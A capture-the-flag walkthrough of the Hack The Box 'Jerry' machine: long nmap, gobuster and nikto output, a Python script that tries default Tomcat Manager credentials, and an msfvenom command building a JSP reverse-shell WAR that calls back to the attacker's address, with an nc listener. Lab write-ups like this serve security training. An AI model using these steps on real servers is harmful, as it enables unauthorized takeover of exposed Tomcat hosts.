This is a walkthrough of the Jerry box from Hack The Box, done without the Metasploit framework's exploit modules (msfvenom is used only to build the payload).
1. Reconnaissance
I came across nmapAutomator, an all-in-one recon wrapper around nmap that also kicks off gobuster and nikto against any web servers it finds. I will use it to run all my scans:
./nmapAutomator.sh 10.10.10.95 All
- All = runs all the scans consecutively
- Note: The full run took about 30 minutes for me, but results stream in as each stage finishes, so you can start working with the early findings while the rest completes. Here the most useful item (the default Manager credentials, reported by nikto) did not show up until about 25 minutes in, so budget your time accordingly.
The completed scan gives us this info:
Running all scans on 10.10.10.95
Host is likely running Windows
———————Starting Nmap Quick Scan———————
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:44 PDT
Nmap scan report for 10.10.10.95
Host is up (0.091s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds
———————Starting Nmap Basic Scan———————
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:44 PDT
Nmap scan report for 10.10.10.95
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
———————-Starting Nmap UDP Scan———————-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:45 PDT
Nmap scan report for 10.10.10.95
Host is up.
All 1000 scanned ports on 10.10.10.95 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.56 seconds
———————Starting Nmap Full Scan———————-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:48 PDT
Initiating Parallel DNS resolution of 1 host. at 21:48
Completed Parallel DNS resolution of 1 host. at 21:48, 0.05s elapsed
Initiating SYN Stealth Scan at 21:48
Scanning 10.10.10.95 [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
SYN Stealth Scan Timing: About 11.72% done; ETC: 21:52 (0:03:54 remaining)
SYN Stealth Scan Timing: About 23.15% done; ETC: 21:52 (0:03:23 remaining)
SYN Stealth Scan Timing: About 33.46% done; ETC: 21:52 (0:03:01 remaining)
SYN Stealth Scan Timing: About 43.95% done; ETC: 21:53 (0:02:38 remaining)
SYN Stealth Scan Timing: About 58.57% done; ETC: 21:52 (0:01:49 remaining)
SYN Stealth Scan Timing: About 69.48% done; ETC: 21:52 (0:01:21 remaining)
SYN Stealth Scan Timing: About 81.43% done; ETC: 21:52 (0:00:49 remaining)
Completed SYN Stealth Scan at 21:52, 262.67s elapsed (65535 total ports)
Nmap scan report for 10.10.10.95
Host is up (0.093s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
8080/tcp open http-proxy
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.78 seconds
Raw packets sent: 131260 (5.775MB) | Rcvd: 192 (8.448KB)
No new ports
———————Starting Nmap Vulns Scan———————
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:52 PDT
Nmap scan report for 10.10.10.95
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:52 PDT
Nmap scan report for 10.10.10.95
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
|_http-server-header: Apache-Coyote/1.1
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 248.72 seconds
———————Recon Recommendations———————-
Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 -o recon/gobuster_10.10.10.95_8080.txt
nikto -host 10.10.10.95:8080 | tee recon/nikto_10.10.10.95_8080.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (1) s:
———————Running Recon Commands———————-
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.95:8080
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/24 21:57:35 Starting gobuster
===============================================================
http://10.10.10.95:8080/aux (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs (Status: 302) [Size: 0]
http://10.10.10.95:8080/examples (Status: 302) [Size: 0]
http://10.10.10.95:8080/favicon.ico (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/lpt1 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager (Status: 302) [Size: 0]
http://10.10.10.95:8080/nul (Status: 200) [Size: 0]
===============================================================
2020/09/24 21:59:09 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
—————————————————————————
+ Target IP: 10.10.10.95
+ Target Hostname: 10.10.10.95
+ Target Port: 8080
+ Start Time: 2020-09-24 21:59:10 (GMT-7)
—————————————————————————
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7967 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2020-09-24 22:13:47 (GMT-7) (877 seconds)
—————————————————————————
+ 1 host(s) tested
Finished nikto scan
=========================
———————Finished all Nmap scans———————
Completed in 29 minute(s) and 6 second(s)
A summary of the results:
- One TCP port open: 8080, Apache Tomcat 7.0.88 (Apache-Coyote/1.1 connector)
- The Tomcat Manager application is exposed at /manager/html (it answers 401, so it sits behind HTTP Basic auth), along with /host-manager/html
- nikto found that the Manager accepts the well-known default credentials tomcat/s3cret
- Anyone with Manager access can deploy arbitrary WAR files, and a JSP inside a deployed WAR runs as the Tomcat service account. So we can deploy a WAR containing a JSP reverse shell
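The default-credential check nikto did above is worth being able to reproduce by hand, because nikto's list is short and the Manager's responses need interpreting. The following is an added example written for this page, not code from the original post or from nmapAutomator/nikto. It sends the same HTTP Basic credentials a browser would and separates a 401 (wrong credentials) from a 403 (valid credentials, but the account lacks the manager-gui or manager-script role, so the login is right and the GUI is still blocked). The target URL and the short list of default pairs are assumptions for illustration.

```python
"""Try well-known Tomcat Manager default credentials and interpret the result.

Added example for this walkthrough; not part of the original post.
"""
import base64
import sys
import urllib.error
import urllib.request

# Illustrative list of default Tomcat pairs (assumption: short, not exhaustive).
# tomcat/s3cret is the pair nikto reported on this box.
DEFAULT_CREDS = [
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("admin", ""),
    ("tomcat", ""),
    ("role1", "tomcat"),
    ("both", "tomcat"),
]


def basic_auth_header(user: str, password: str) -> str:
    """Build the Authorization header value a browser sends after the 401 prompt."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def classify(status: int) -> str:
    """Map the Manager's HTTP status to a verdict about the credentials.

    Tomcat answers 401 when the realm rejects the user/password, but 403 when the
    user authenticated and simply has none of the roles the Manager requires.
    That 403 still means the password is right, which matters for host-manager
    or for scripting via /manager/text.
    """
    if status == 200:
        return "valid"
    if status == 403:
        return "valid-no-role"
    if status == 401:
        return "invalid"
    return "unknown"


def try_manager_login(base_url: str, user: str, password: str, timeout: float = 5) -> str:
    """Send one authenticated GET to /manager/html and classify the response."""
    req = urllib.request.Request(
        f"{base_url}/manager/html",
        headers={"Authorization": basic_auth_header(user, password)},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as err:
        return classify(err.code)


def find_default_creds(base_url: str, creds=DEFAULT_CREDS):
    """Return (user, password, verdict) for the first pair Tomcat authenticates."""
    for user, password in creds:
        verdict = try_manager_login(base_url, user, password)
        if verdict in ("valid", "valid-no-role"):
            return user, password, verdict
    return None


if __name__ == "__main__":
    # Assumed target from the scan output above; override on the command line.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.95:8080"
    print(find_default_creds(target))
```

Run it against the box after the scan finishes; a `valid-no-role` result is the case to watch for, since it means the password works but deployment has to go through whichever interface the account's role permits.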
2. Exploitation
Open a browser, go to http://10.10.10.95:8080/manager/html and log in with tomcat/s3cret when prompted.
Now use msfvenom to generate a WAR payload containing a JSP reverse shell (LHOST is your HTB VPN address, LPORT the port your listener will use):
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war
Then upload shell.war with the "WAR file to deploy" form in the Manager and click Deploy. It appears in the application list under the path /shell (taken from the WAR's filename):
Before triggering it, open a new terminal and start a listener on the LPORT you used when generating the payload (4444 here):
nc -nlvp 4444
Now click the /shell link in the application list. That requests the deployed JSP, Tomcat compiles and runs it, and it connects back to your listener. Run whoami and we see we are nt authority\system: the Tomcat service runs as SYSTEM (the Windows equivalent of root), so there is no privilege escalation step on this box:
Grab your flags!